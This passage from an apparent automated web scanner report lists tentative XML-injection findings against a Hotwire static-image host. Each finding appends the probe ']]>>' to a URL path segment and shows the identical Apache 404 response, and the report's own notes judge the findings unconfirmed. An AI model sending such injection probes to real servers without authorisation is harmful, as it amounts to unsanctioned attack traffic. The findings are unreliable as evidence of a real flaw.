Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:54 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.46. http://ak-static.hotwirestatic.com/static/images/buttons/btn-submit2.png [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/buttons/btn-submit2.png

Issue detail

The payload ]]>> was appended to the value of the REST URL parameter 2 (the path segment images). The scanner reported this as a possible XML injection because the response matched its heuristic for an error in a server-side XML or SOAP parser. The response shown does not support that: it is the host's standard Apache 404 page, the same 1422-byte XHTML document returned for every probe against this host, which merely begins with an XML declaration and contains no parser error message. Treat the finding as unconfirmed until a control request (the same path with a benign junk segment) shows a response that differs from the probed one.

Request

GET /static/images]]>>/buttons/btn-submit2.png?ver=222337 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535999
Date: Mon, 03 Oct 2011 01:01:57 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.47. http://ak-static.hotwirestatic.com/static/images/buttons/btn-submit2.png [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/buttons/btn-submit2.png

Issue detail

The payload ]]>> was appended to the value of the REST URL parameter 3 (the path segment buttons). The scanner reported this as a possible XML injection because the response matched its heuristic for an error in a server-side XML or SOAP parser. The response shown does not support that: it is the host's standard Apache 404 page, the same 1422-byte XHTML document returned for every probe against this host, which merely begins with an XML declaration and contains no parser error message. Treat the finding as unconfirmed until a control request (the same path with a benign junk segment) shows a response that differs from the probed one.

Request

GET /static/images/buttons]]>>/btn-submit2.png?ver=222337 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:59 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.48. http://ak-static.hotwirestatic.com/static/images/buttons/btn-submit2.png [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/buttons/btn-submit2.png

Issue detail

The payload ]]>> was appended to the value of the REST URL parameter 4 (the path segment btn-submit2.png). The scanner reported this as a possible XML injection because the response matched its heuristic for an error in a server-side XML or SOAP parser. The response shown does not support that: it is the host's standard Apache 404 page, the same 1422-byte XHTML document returned for every probe against this host, which merely begins with an XML declaration and contains no parser error message. Treat the finding as unconfirmed until a control request (the same path with a benign junk segment) shows a response that differs from the probed one.

Request

GET /static/images/buttons/btn-submit2.png]]>>?ver=222337 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:02 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.49. http://ak-static.hotwirestatic.com/static/images/car-add-on/img-car-type-selector-OFF-new.png [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/car-add-on/img-car-type-selector-OFF-new.png

Issue detail

The payload ]]>> was appended to the value of the REST URL parameter 1 (the path segment static). The scanner reported this as a possible XML injection because the response matched its heuristic for an error in a server-side XML or SOAP parser. The response shown does not support that: it is the host's standard Apache 404 page, the same 1422-byte XHTML document returned for every probe against this host, which merely begins with an XML declaration and contains no parser error message. Treat the finding as unconfirmed until a control request (the same path with a benign junk segment) shows a response that differs from the probed one.

Request

GET /static]]>>/images/car-add-on/img-car-type-selector-OFF-new.png?ver=193844 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:16 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.50. http://ak-static.hotwirestatic.com/static/images/car-add-on/img-car-type-selector-OFF-new.png [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/car-add-on/img-car-type-selector-OFF-new.png

Issue detail

The payload ]]>> was appended to the value of the REST URL parameter 2 (the path segment images). The scanner reported this as a possible XML injection because the response matched its heuristic for an error in a server-side XML or SOAP parser. The response shown does not support that: it is the host's standard Apache 404 page, the same 1422-byte XHTML document returned for every probe against this host, which merely begins with an XML declaration and contains no parser error message. Treat the finding as unconfirmed until a control request (the same path with a benign junk segment) shows a response that differs from the probed one.

Request

GET /static/images]]>>/car-add-on/img-car-type-selector-OFF-new.png?ver=193844 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:18 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.51. http://ak-static.hotwirestatic.com/static/images/car-add-on/img-car-type-selector-OFF-new.png [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/car-add-on/img-car-type-selector-OFF-new.png

Issue detail

The payload ]]>> was appended to the value of the REST URL parameter 3 (the path segment car-add-on). The scanner reported this as a possible XML injection because the response matched its heuristic for an error in a server-side XML or SOAP parser. The response shown does not support that: it is the host's standard Apache 404 page, the same 1422-byte XHTML document returned for every probe against this host, which merely begins with an XML declaration and contains no parser error message. Treat the finding as unconfirmed until a control request (the same path with a benign junk segment) shows a response that differs from the probed one.

Request

GET /static/images/car-add-on]]>>/img-car-type-selector-OFF-new.png?ver=193844 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535989
Date: Mon, 03 Oct 2011 01:02:20 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.52. http://ak-static.hotwirestatic.com/static/images/car-add-on/img-car-type-selector-OFF-new.png [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/car-add-on/img-car-type-selector-OFF-new.png

Issue detail

The payload ]]>> was appended to the value of the REST URL parameter 4 (the path segment img-car-type-selector-OFF-new.png). The scanner reported this as a possible XML injection because the response matched its heuristic for an error in a server-side XML or SOAP parser. The response shown does not support that: it is the host's standard Apache 404 page, the same 1422-byte XHTML document returned for every probe against this host, which merely begins with an XML declaration and contains no parser error message. Treat the finding as unconfirmed until a control request (the same path with a benign junk segment) shows a response that differs from the probed one.

Request

GET /static/images/car-add-on/img-car-type-selector-OFF-new.png]]>>?ver=193844 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Mon, 03 Oct 2011 01:02:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:22 GMT
Content-Length: 1422
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.53. http://ak-static.hotwirestatic.com/static/images/core/background/208x3-grid-bg.gif [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/core/background/208x3-grid-bg.gif

Issue detail

The payload ]]>> was appended to the value of the REST URL parameter 1 (the path segment static). The scanner reported this as a possible XML injection because the response matched its heuristic for an error in a server-side XML or SOAP parser. The response shown does not support that: it is the host's standard Apache 404 page, the same 1422-byte XHTML document returned for every probe against this host, which merely begins with an XML declaration and contains no parser error message. Treat the finding as unconfirmed until a control request (the same path with a benign junk segment) shows a response that differs from the probed one.

Request

GET /static]]>>/images/core/background/208x3-grid-bg.gif?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:57 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.54. http://ak-static.hotwirestatic.com/static/images/core/background/208x3-grid-bg.gif [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/core/background/208x3-grid-bg.gif

Issue detail

The payload ]]>> was appended to the value of the REST URL parameter 2 (the path segment images). The scanner reported this as a possible XML injection because the response matched its heuristic for an error in a server-side XML or SOAP parser. The response shown does not support that: it is the host's standard Apache 404 page, the same 1422-byte XHTML document returned for every probe against this host, which merely begins with an XML declaration and contains no parser error message. Treat the finding as unconfirmed until a control request (the same path with a benign junk segment) shows a response that differs from the probed one.

Request

GET /static/images]]>>/core/background/208x3-grid-bg.gif?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:59 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.55. http://ak-static.hotwirestatic.com/static/images/core/background/208x3-grid-bg.gif [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/core/background/208x3-grid-bg.gif

Issue detail

The payload ]]>> was appended to the value of the REST URL parameter 3 (the path segment core). The scanner reported this as a possible XML injection because the response matched its heuristic for an error in a server-side XML or SOAP parser. The response shown does not support that: it is the host's standard Apache 404 page, the same 1422-byte XHTML document returned for every probe against this host, which merely begins with an XML declaration and contains no parser error message. Treat the finding as unconfirmed until a control request (the same path with a benign junk segment) shows a response that differs from the probed one.

Request

GET /static/images/core]]>>/background/208x3-grid-bg.gif?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.56. http://ak-static.hotwirestatic.com/static/images/core/background/208x3-grid-bg.gif [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/core/background/208x3-grid-bg.gif

Issue detail

The payload ]]>> was appended to the value of the REST URL parameter 4 (the path segment background). The scanner reported this as a possible XML injection because the response matched its heuristic for an error in a server-side XML or SOAP parser. The response shown does not support that: it is the host's standard Apache 404 page, the same 1422-byte XHTML document returned for every probe against this host, which merely begins with an XML declaration and contains no parser error message. Treat the finding as unconfirmed until a control request (the same path with a benign junk segment) shows a response that differs from the probed one.

Request

GET /static/images/core/background]]>>/208x3-grid-bg.gif?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535991
Date: Mon, 03 Oct 2011 01:02:09 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.57. http://ak-static.hotwirestatic.com/static/images/core/background/208x3-grid-bg.gif [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/core/background/208x3-grid-bg.gif

Issue detail

The payload ]]>> was appended to the value of the REST URL parameter 5 (the path segment 208x3-grid-bg.gif). The scanner reported this as a possible XML injection because the response matched its heuristic for an error in a server-side XML or SOAP parser. The response shown does not support that: it is the host's standard Apache 404 page, the same 1422-byte XHTML document returned for every probe against this host, which merely begins with an XML declaration and contains no parser error message. Treat the finding as unconfirmed until a control request (the same path with a benign junk segment) shows a response that differs from the probed one.

Request

GET /static/images/core/background/208x3-grid-bg.gif]]>>?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:13 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.58. http://ak-static.hotwirestatic.com/static/images/core/map/img_poi.png [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/core/map/img_poi.png

Issue detail

The payload ]]>> was appended to the value of the REST URL parameter 1 (the path segment static). The scanner reported this as a possible XML injection because the response matched its heuristic for an error in a server-side XML or SOAP parser. The response shown does not support that: it is the host's standard Apache 404 page, the same 1422-byte XHTML document returned for every probe against this host, which merely begins with an XML declaration and contains no parser error message. Treat the finding as unconfirmed until a control request (the same path with a benign junk segment) shows a response that differs from the probed one.

Request

GET /static]]>>/images/core/map/img_poi.png?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:37 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.59. http://ak-static.hotwirestatic.com/static/images/core/map/img_poi.png [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/core/map/img_poi.png

Issue detail

The payload ]]>> was appended to the value of the REST URL parameter 2 (the path segment images). The scanner reported this as a possible XML injection because the response matched its heuristic for an error in a server-side XML or SOAP parser. The response shown does not support that: it is the host's standard Apache 404 page, the same 1422-byte XHTML document returned for every probe against this host, which merely begins with an XML declaration and contains no parser error message. Treat the finding as unconfirmed until a control request (the same path with a benign junk segment) shows a response that differs from the probed one.

Request

GET /static/images]]>>/core/map/img_poi.png?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535990
Date: Mon, 03 Oct 2011 01:02:40 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.60. http://ak-static.hotwirestatic.com/static/images/core/map/img_poi.png [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/core/map/img_poi.png

Issue detail

The payload ]]>> was appended to the value of the REST URL parameter 3 (the path segment core). The scanner reported this as a possible XML injection because the response matched its heuristic for an error in a server-side XML or SOAP parser. The response shown does not support that: it is the host's standard Apache 404 page, the same 1422-byte XHTML document returned for every probe against this host, which merely begins with an XML declaration and contains no parser error message. Treat the finding as unconfirmed until a control request (the same path with a benign junk segment) shows a response that differs from the probed one.

Request

GET /static/images/core]]>>/map/img_poi.png?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:43 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.61. http://ak-static.hotwirestatic.com/static/images/core/map/img_poi.png [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/core/map/img_poi.png

Issue detail

The payload ]]>> was appended to the value of the REST URL parameter 4 (the path segment map). The scanner reported this as a possible XML injection because the response matched its heuristic for an error in a server-side XML or SOAP parser. The response shown does not support that: it is the host's standard Apache 404 page, the same 1422-byte XHTML document returned for every probe against this host, which merely begins with an XML declaration and contains no parser error message. Treat the finding as unconfirmed until a control request (the same path with a benign junk segment) shows a response that differs from the probed one.

Request

GET /static/images/core/map]]>>/img_poi.png?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
